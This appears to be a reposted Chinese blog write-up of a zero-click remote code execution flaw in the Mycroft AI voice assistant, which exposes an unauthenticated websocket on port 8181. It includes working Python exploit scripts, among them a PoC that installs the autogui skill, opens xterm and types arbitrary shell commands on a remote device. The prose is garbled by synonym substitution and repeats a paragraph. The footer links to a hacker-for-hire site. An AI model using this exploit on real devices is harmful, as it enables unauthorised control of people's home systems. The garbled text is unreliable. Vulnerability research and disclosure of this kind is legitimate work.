智能语音使用Mycroft AI的长途代码履行缝隙剖析

当我在Arch Linux社区开源软件包的开发奉献过程中,发现了一个很有意思的项目-麦考夫Mycroft AI,它是一款开源且根据人工智能(AI)的语音助理使用,在对它的研讨过程中,我发现了一个不必点击...

当我在Arch Linux社区开源软件包的开发奉献过程中,发现了一个很有意思的项目-麦考夫Mycroft AI,它是一款开源且根据人工智能(AI)的语音助理使用,在对它的研讨过程中,我发现了一个不必点击交互即可完成的长途代码履行缝隙(RCE)。
与业界有名的Amazon Echo和Google Home不同的是,Mycroft最早于2019年开端在海外网站建议众筹来批量生产其Mark-I 和 Mark-II 代产品,而3月份其Mark-II代产品上线4天后就被售罄脱销。Mycroft AI智能语音助理根据Linux Desktop/Server和Raspberry PI架构,现广泛用于智能自动化家居体系中,其新款使用将订制化使用于捷豹和路虎的某些车型中。
代码剖析
在对Mycroft AI的源代码剖析中,我发现了其间有意思的一个当地:
...
host = config.get("host")
port = config.get("port")
route = config.get("route")
validate_param(host, "websocket.host")
validate_param(port, "websocket.port")
validate_param(route, "websocket.route")
routes = [
        (route, WebsocketEventHandler)
]
application = web.Application(routes, **settings)
application.listen(port, host)
ioloop.IOLoop.instance().start()
...
在这里它界说了一个websocket服务端,用来接纳类似于Andriod长途客户端的指令,在mycroft.conf中给出了websocket服务端设置的详细界说:
// The mycroft-core messagebus' websocket
  "websocket": {
    "host": "0.0.0.0",
    "port": 8181,
    "route": "/core",
    "ssl": false
},
从以上代码可知,在0.0.0.0:8181/core上默许的websocket服务端居然无需任何身份验证,好吧,让咱们写个脚原本测验一下:
#!/usr/bin/env python
import asyncio
import websockets
uri = "ws://myserver:8181/core"
command = "say pwned"
async def sendPayload():
    async with websockets.connect(uri) as websocket:
      
 await websocket.send("{"data": {"utterances": [""+command+""]},
"type": "recognizer_loop:utterance", "context": null}")
asyncio.get_event_loop().run_until_complete(sendPayload())
很好,咱们能让Mycroft AI自己说 “pwned”,这样,咱们也能让Mycroft AI长途发声,但这也不算是什么大发现,最多也只能吓唬一下朋友罢了。
Mycroft AI 的技术体系
深化发掘之后,能够发现Mycroft内置了一个技术体系,能够在其基础上装置其它你想要的语音技术,听起来很好,不是吗?
那么,Mycroft的一种技术是由哪些米素组成的呢?从给出的阐明文档能够看到,Mycroft的技术米素如下:
dialog/en-us/command.dialog: 包含了能触发技术的语音指令
vocab/en-us/answer.voc: 包含了Mycroft发声的答案
requirements.txt:  包含了由 pip 方法装置的技术所需装置包
__int__.py:包含了技术的主函数和触发履行时的需求加载的指令
使用剖析
有了以上技术米素之后,我就能够创立一个歹意技术,当它被触发之后,就能够在长途Mycroft设备上来履行恣意代码了。但惋惜的是,这样的方法并不能经过语音指令来完成,除非其技术链接URL未被一些在线网站白名单化。这虽然有或许,但多少有些费事。

测验完成
有了以上技术米素之后,我就能够创立一个歹意技术,当它被触发之后,就能够在长途Mycroft设备上来履行恣意代码了。但惋惜的是,这样的方法并不能经过语音指令来完成,除非其技术链接URL是一些未被白名单化的在线网站。这虽然有或许,但履行起来多少有些费事。
Mycroft 内置了许多默许技术,如 open 这种能翻开其它第三方使用的,还有一些经过白名单化但未被装置在Mycroft设备上的技术。经过再次研讨,我发现了一个名为skill-autogui的风趣技术,它的主要功能是对鼠标键盘的操控,好吧,咱们就用它来试试!把一切以上可使用的发现组合成一个PoC:
#!/usr/bin/env python
import sys
import asyncio
import websockets
import time
cmds = ["mute audio"] + sys.argv[1:]
uri = "ws://myserver:8181/core"
async def sendPayload():
    for payload in cmds:
        async with websockets.connect(uri) as websocket:
          
 await websocket.send("{"data": {"utterances": [""+payload+""]},
"type": "recognizer_loop:utterance", "context": null}")
            time.sleep(1)
asyncio.get_event_loop().run_until_complete(sendPayload())
用 pwn.py “install autogui” “open xterm” “type echo pwned” “press enter” 指令运转exploit代码之后,就能在一台长途Mycroft设备的Linux体系上履行指令:

[1] [2]  黑客接单网

  • 发表于 2021-04-08 12:09
  • 阅读 ( 248 )
  • 分类:互联网

0 条评论

请先 登录 后评论
w阿成
w阿成 个性签名

670 篇文章

你可能感兴趣的文章

相关问题